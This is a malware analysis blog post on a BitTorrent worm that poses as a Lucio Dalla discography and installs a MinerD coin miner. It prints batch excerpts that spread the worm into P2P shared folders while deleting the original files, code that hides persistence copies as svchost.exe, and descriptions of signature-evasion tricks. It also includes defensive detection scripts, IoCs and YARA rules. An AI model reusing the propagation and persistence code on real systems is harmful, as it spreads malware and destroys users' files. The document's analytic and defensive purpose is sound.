
P2P Worm Spreads Crypto-Miners in the Wild
07/23/2019
Introduction
In the past months we published a white paper exploring the risks users face when downloading material from P2P sharing networks such as BitTorrent, and we discussed how easily crooks lure their victims into downloading malware along with the desired content. Recently, our threat monitoring operations pointed us to an interesting file named “Lucio Dalla Discografia Completa”: it pretends to be the complete discography of a famous Italian singer, but it actually hides malicious intent.
For this reason, Cybaze-Yoroi ZLAB dissected this threat to reveal its hidden virulent nature.
Technical Analysis
As anticipated, the file downloaded from the BitTorrent network is an executable. A quick recon revealed that it is actually an SFX archive containing several other files.
Hash | f9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a |
Threat | Miner-Dropper |
Brief Description | Coin-miner dropper (SFX archive) |
Ssdeep | 98304:BbEwGxyUOn/JaYYaeY+dM6YydmOQ1zYuuUBb53+munE0dMp1oHnXZetvRfuODYN |
Table 1: Static Information about the miner dropper
Using an SFX archive allows the attacker to hide the content of the malicious PE and significantly reduce the detection rate. Opening the sample with a common archive manager such as WinRAR or 7-Zip unveils its content.
The archive contains more than a dozen files. In detail it embeds:
- 16 temporary files used during execution;
- a Visual Basic Script;
- a batch script;
- a setup file.
On the right of Figure 1 it is possible to see the SFX configuration file. After the auto-extraction, the first file run is “run.vbs”. Its content is minimal and quickly redirects execution to a small batch file, “installer.bat”, contained in the same folder: it runs installer.bat with the parameters "0" (WindowStyle 0, i.e. hidden, so the script runs without a visible window that could trigger antivirus heuristics) and "true" (WaitOnReturn).
The content of “installer.bat” is also minimal and points to a more complex text file, "007.tmp", later renamed "007.bat". That file weighs over 59 KB and contains the more interesting functionality.
Unlike the previous scripts, the “007” file performs many operations. The first is to copy all files contained in the extraction directory into a “#” subdirectory and to rename some of the just-extracted files, suggesting that some of them are dependencies of a more complex chain.
    @echo off & setlocal enabledelayedexpansion
    set CURRDIR=%~dp0
    md #
    copy "%CURRDIR%/002.tmp" "%CURRDIR%/#/002.tmp"
    copy "%CURRDIR%/003.tmp" "%CURRDIR%/#/003.tmp"
    copy "%CURRDIR%/004.tmp" "%CURRDIR%/#/004.tmp"
    copy "%CURRDIR%/005.tmp" "%CURRDIR%/#/005.tmp"
    copy "%CURRDIR%/006.tmp" "%CURRDIR%/#/006.tmp"
    copy "%CURRDIR%/007.tmp" "%CURRDIR%/#/007.tmp"
    copy "%CURRDIR%/008.tmp" "%CURRDIR%/#/008.tmp"
    copy "%CURRDIR%/010.tmp" "%CURRDIR%/#/010.tmp"
    copy "%CURRDIR%/011.tmp" "%CURRDIR%/#/011.tmp"
    copy "%CURRDIR%/013.tmp" "%CURRDIR%/#/013.tmp"
    copy "%CURRDIR%/014.tmp" "%CURRDIR%/#/014.tmp"
    copy "%CURRDIR%/016.tmp" "%CURRDIR%/#/016.tmp"
    copy "%CURRDIR%/installer.bat" "%CURRDIR%/#/installer.bat"
    copy "%CURRDIR%/run.vbs" "%CURRDIR%/#/run.vbs"
    copy "%CURRDIR%/002.tmp" "%CURRDIR%/7z.exe"
    copy "%CURRDIR%/003.tmp" "%CURRDIR%/7z.dll"
    copy "%CURRDIR%/004.tmp" "%CURRDIR%/Default.SFX"
    copy "%CURRDIR%/005.tmp" "%CURRDIR%/Rar.exe"
    copy "%CURRDIR%/006.tmp" "%CURRDIR%/sfx.conf
Code Snippet 1: Copy of the files in a subfolder
After that, it generates three files named “001.tmp”, “32.tmp” and “64.tmp”, later renamed with the “.exe” suffix. They are created by combining the original files: in particular, “001.tmp” is built by concatenating “008.tmp”, “009.tmp” and “010.tmp”. The resulting executable had been split into those chunks to evade AV signatures.
But this composed executable hides another interesting detail. Before merging the file slices, the script replaces part of the PE header: it overwrites the “This program cannot be run in DOS mode” string with random characters, producing a different file hash at every infection. This polymorphic technique, implemented directly in the batch stage, is applied to all the other chunked files embedded in the original SFX archive.
After that, the script uses the just-created “Rar.exe” and “7z.exe” to build new SFX files in directories belonging to P2P applications. This trick spreads the attack across file-sharing communities, compromising many more victims and keeping the infection alive. An example of this routine follows:
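The DOS-stub rewrite described above leaves a recognisable trace: the sentence still starts with "!This " and ends with " cannot be run in DOS mode", only the seven characters of "program" differ. The following added example (written for this page, not code from the Yoroi report) parses the MZ header of a PE image, extracts the stub that sits before the PE signature and classifies it as intact, mutated (the same byte pattern the page's YARA rules $h2/$h3 look for) or missing; the samples it scans are constructed in memory and are not real binaries.

```python
import re
import struct

# Standard DOS stub message; the batch stage overwrites "program" (7 chars) with random bytes.
EXPECTED_STUB = b"This program cannot be run in DOS mode"
# Mirrors the $h2/$h3 byte pattern of the page's YARA rules: "!This " + 7 wildcards + " cannot be ru"
MUTATED_STUB = re.compile(rb"!This .{7} cannot be ru", re.DOTALL)


def classify_dos_stub(data: bytes) -> str:
    """Classify the DOS stub of a PE image: 'not-pe', 'intact', 'mutated' or 'missing'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not-pe"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # offset of the "PE\0\0" signature
    if e_lfanew + 4 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "not-pe"
    stub = data[0x40:e_lfanew]  # the DOS stub sits between the MZ header and the PE signature
    if EXPECTED_STUB in stub:
        return "intact"
    if MUTATED_STUB.search(stub):
        return "mutated"  # the "This program" sentence was rewritten, as the batch stage does
    return "missing"


def build_sample(stub_text: bytes) -> bytes:
    """Constructed (not a real binary) MZ/PE skeleton carrying the given stub text."""
    # int 21h ... int 21h: the trailing 0x21 is the '!' that precedes "This" in real stubs
    stub = b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21" + stub_text + b".\r\r\n$"
    header = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40 + len(stub))
    return bytes(header) + stub + b"PE\0\0" + b"\0" * 20


def triage(samples: dict) -> dict:
    """Return {name: verdict} for a batch of in-memory PE images."""
    return {name: classify_dos_stub(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    demo = {  # constructed samples: a clean stub and one mutated like the page describes
        "clean.exe": build_sample(b"This program cannot be run in DOS mode"),
        "001.exe": build_sample(b"This Xk9qz2L cannot be run in DOS mode"),
    }
    for name, verdict in triage(demo).items():
        print(f"{name}: {verdict}")
```

A "mutated" verdict on a file that is otherwise a valid PE is a cheap triage signal worth pairing with the YARA rules at the end of the post.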
    for /d /r "c:\" %%a in (preferences.ini) do (
        if exist "%%a" (
            for /f %%b in ('findstr /c:"IncomingDir=" "%%a"') do (
                set "var=%%b"
                for %%c in ("!var:~12!\*.*") do (
                    ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
                    rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
                    7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
                    del "%%~nc".exe
                    del "%%c"
                    move "%%~nc.zip" "!var:~12!\"
                )
            )
        )
    )
    [...]
    for /d /r "c:\" %%a in (*) do (
        if /i "%%~nxa"=="my grokster" (
            set "var=%%a"
            (
                for %%c in ("!var!\*.*") do (
                    ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
                    rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
                    7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
                    del "%%~nc".exe
                    del "%%c"
                    move "%%~nc.zip" "!var!\"
                )
            )
        )
    )
Code Snippet 2: Example of propagation routine
All these actions are performed for each system drive letter (C:, D:, X: and so on). After that, the script checks the Microsoft Windows OS version, from “5.x” to “15.x”, and finally executes specific routines according to the target machine. These routines perform a few basic operations:
- Create a new directory in “%systemdrive%\AppCache\x86” and immediately hide it;
- Copy the file “001.tmp” into the Startup folder (for every OS language), renaming it “svchost.exe”, and copy 32.tmp or 64.tmp into “AppCache\x86\”;
- Execute the “001.exe” file.
    :win7
    if defined PROGRAMFILES(X86) (goto x64) else (goto x86)
    :x64
    mkdir %systemdrive%\AppCache\x86
    attrib +s +h %systemdrive%\AppCache\x86
    attrib +s +h %systemdrive%\AppCache
    copy /y "%CURRDIR%\001.tmp" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
    copy /y "%CURRDIR%\001.tmp" "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
    [...]
    copy /y "%CURRDIR%\64.tmp" "%systemdrive%\AppCache\x86\svchost.exe"
    attrib +h "%systemdrive%\AppCache\x86\svchost.exe"
    "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
    "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
    [...]
    goto end
Code Snippet 3: Choice of the files to copy depending on whether the target architecture is x86 or x64
At this point, control passes to the 001.exe file located in the Startup folder.
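Both persistence locations used by the routine above are unusual homes for a file called svchost.exe, which normally lives under the Windows system directories. The following added hunting check (written for this page, not code from the report) walks a drive and reports every svchost.exe found outside System32/SysWOW64/WinSxS, tagging the two drop locations the batch stage uses; it inspects paths only, not the hidden attribute set by attrib +s +h, and the infected tree it scans is constructed in a temporary directory.

```python
import os
import tempfile

# Locations the batch stage writes to; compared case-insensitively against directory paths.
STARTUP_TAIL = os.path.join("start menu", "programs", "startup")
APPCACHE_TAIL = os.path.join("appcache", "x86")
# Directories where a genuine svchost.exe lives; a copy anywhere else deserves a look.
LEGIT_SVCHOST_DIRS = {"system32", "syswow64", "winsxs"}


def hunt_svchost(root: str) -> list:
    """Walk root and return (path, reason) for svchost.exe copies outside the Windows system dirs."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        low = dirpath.lower()
        if LEGIT_SVCHOST_DIRS & set(low.split(os.sep)):
            continue  # expected location of the real service host binary
        for name in files:
            if name.lower() != "svchost.exe":
                continue
            if low.endswith(STARTUP_TAIL):
                reason = "svchost.exe in Startup folder (the 001.exe launcher)"
            elif low.endswith(APPCACHE_TAIL):
                reason = "svchost.exe in AppCache\\x86 (the 32/64.exe miner)"
            else:
                reason = "svchost.exe outside the Windows system directories"
            hits.append((os.path.join(dirpath, name), reason))
    return hits


def build_demo_tree() -> str:
    """Constructed directory tree mimicking an infected %systemdrive% (sample data, not a real host)."""
    root = tempfile.mkdtemp(prefix="appcache_demo_")
    for rel in (
        os.path.join("Windows", "System32", "svchost.exe"),  # legitimate, must not be reported
        os.path.join("AppCache", "x86", "svchost.exe"),
        os.path.join("Users", "bob", "AppData", "Roaming", "Microsoft", "Windows",
                     "Start Menu", "Programs", "Startup", "svchost.exe"),
    ):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(b"MZ")  # placeholder content, enough for the path-based check
    return root


if __name__ == "__main__":
    for path, reason in hunt_svchost(build_demo_tree()):
        print(f"{reason}: {path}")
```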
The 001 File
The 001.exe file is packed with a known version of the UPX compressor, so extracting the payload is quite straightforward.
Hash | b6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea |
Threat | Miner Launcher |
Brief Description | Coin-miner Payload (001.exe) packed with UPX |
Ssdeep | 3072:A3VD85gJFV8QncMujKCv0jqAi0hIazLEHYxWVfhn+zM45uUyvHBsV2svkgfODQ2C |
Table 2: Generic info about the Miner Loader
Hash | 7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422 |
Threat | Miner Launcher Decompressed |
Brief Description | Coin-miner Payload (001.exe) unpacked |
Ssdeep | 12288:7EyxWjS8ZZVajy6YWgHQ+oHxlJz4UE0UsZ+GmYNuuv:oyxWjS8ZZVUYWgw1Hh |
Table 3: Generic info about the Miner Loader unpacked
Analyzing the decompressed binary, we noticed that the malware first tries to run the “svchost.exe” binary located in “%systemdrive%\AppCache\x86”, which is likely the real payload.
The Payload
Hash | 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263 |
Threat | Miner-Payload |
Brief Description | Coin-miner Payload (32.exe) packed with UPX (minerd) |
Ssdeep | 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263 |
Table 4: Generic information about the coin miner compiled for 32 bit (UPX packed)
Hash | a3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d |
Threat | Miner-Payload |
Brief Description | Coin-miner Payload (64.exe) packed with UPX (minerd) |
Ssdeep | 49152:sb5CY+muocuUwlCdMsQd1pSHn/5JKIezmMNkG7403EIlnDysnue759ByzPIYNUN |
Table 5: Generic information about the coin miner compiled for 64 bit (UPX packed)
The “svchost.exe” placed in the “%systemdrive%\AppCache\x86” folder is actually one of the two files “32.exe” and “64.exe” created earlier. After the unpacking routines, the results are the following.
Hash | 746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e |
Threat | Miner-Payload |
Brief Description | Coin-miner Payload (32.exe) unpacked (minerd) |
Ssdeep | 196608:aN8/juE4Be73AeWNEwVGuhcf7eVhbjYV:tuwUbK |
Table 6: Generic information about the coin miner compiled for 32 bit (UPX unpacked)
Hash | 552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7 |
Threat | Miner-Payload |
Brief Description | Coin-miner Payload (64.exe) unpacked(minerd) |
Ssdeep | 393216:6ovgtbTTTpT1TITHThTtTwTaTtTVTFTZTlTNTbTwTuTzT1T0TtTlT1ToTlTzTVTz:6 |
Table 7: Generic information about the coin miner compiled for 64 bit (UPX unpacked)
Obviously, these hashes change at every infection due to the polymorphic technique implemented in the batch stage described above. The sole purpose of “001.exe” is to execute the “32.exe” or “64.exe” contained in “%systemdrive%\AppCache\x86”, a Stratum-based coin miner. Stratum is the de-facto standard protocol used by crypto-miners to connect to mining pools.
Exploring the sample, we noticed that it is actually “MinerD”, open-source crypto-mining software publicly available on GitHub.
Conclusion
This threat reminds us of the hidden risks of downloading material through P2P networks, along with the tricks adopted by the crooks to keep the campaign running in the wild. Indeed, this sample is able to survive across multiple P2P networks by propagating to the P2P shared folders configured on the victim machine, ensuring a good level of resilience from the attacker's point of view. Also, the attackers implemented a polymorphic trick directly in batch language, replacing part of the PE file header to create unique samples on each infection.
A naive or distracted user can be lured into downloading infected media content with the promise of hearing his favourite musician, but this action can compromise the victim's machine and feed the cyber-criminals behind this campaign. This time the consequences of such a lack of awareness are quite contained: the final payload is a crypto-miner and the user may only experience delays or crashes. But what if the payload were a bot, a RAT, or even ransomware? The consequences could be decidedly more serious.
Indicators of Compromise
Hash
- f9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a
- b6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea
- 7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422
- 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263
- a3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d
- 746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e
- 552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7
Mining Pool (Coin-Miner):
- tcp://xcnpool[.1gh[.com
Yara Rules
rule LucioDalla_CoinMiner_SFX_201907 {
    meta:
        description = "Yara Rule for SFX file of Lucio Dalla CoinMiner"
        author = "ZLAB Yoroi - Cybaze"
        last_updated = "2019-07-12"
        tlp = "white"
        category = "informational"
    strings:
        $s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov"
        $s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov"
        $s3 = "7-Zip - Copyright (c) 1999-2011 " ascii
        $s4 = "sfxelevation" ascii wide
        $h1 = { 30 ?? ?? 2E 74 6D 70 }
        $setup = "setup" wide ascii
    condition:
        any of ($s*) and $setup and (#h1 > 8)
}
rule LucioDalla_001_UPX_201907 {
    meta:
        description = "Yara Rule for 001 UPX file of Lucio Dalla CoinMiner"
        author = "ZLAB Yoroi - Cybaze"
        last_updated = "2019-07-12"
        tlp = "white"
        category = "informational"
    strings:
        $s1 = "UPX"
        $h1 = { CB 40 5A 3E 2A E5 A2 C3 }
        $h2 = { 38 D5 CD 57 3F E4 BF 45 }
        $h3 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }
    condition:
        all of them
}
rule LucioDalla_001_Unpacked_201907 {
    meta:
        description = "Yara Rule for 001 unpacked file of Lucio Dalla CoinMiner"
        author = "ZLAB Yoroi - Cybaze"
        last_updated = "2019-07-12"
        tlp = "white"
        category = "informational"
    strings:
        $s1 = "zPLR"
        $s2 = "\\AppCache\\x86\\svchost.exe"
        $h1 = { 24 E8 5A CF FF FF 83 EC 04 }
        $h2 = { 21 54 68 69 73 20 ?? ?? ?? ?? ?? ?? ?? 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 }
    condition:
        all of them
}
rule LucioDalla_Miner_Workers_201907 {
    meta:
        description = "Yara Rule for all CoinMiner Workers"
        author = "ZLAB Yoroi - Cybaze"
        last_updated = "2019-07-12"
        tlp = "white"
        category = "informational"
    strings:
        $upx = "UPX"
        $hpa32 = { 42 DA 92 BF 2D BB F0 B0 }
        $hpb32 = { 2F 4D 7B 8C 83 FB 03 FF C2 }
        $hp64a = { B0 29 74 3A 48 55 04 6C 30 }
        $hp64b = { 11 60 6C A4 E9 FA 71 BE 47 }
        $s1 = "blowfish.c"
        $s2 = "mpih-rshift-asm"
        $s3 = { D0 67 EC 67 B6 67 AF 67 F5 }
    condition:
        ($upx and 2 of ($hp*)) or (all of ($s*))
}
This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB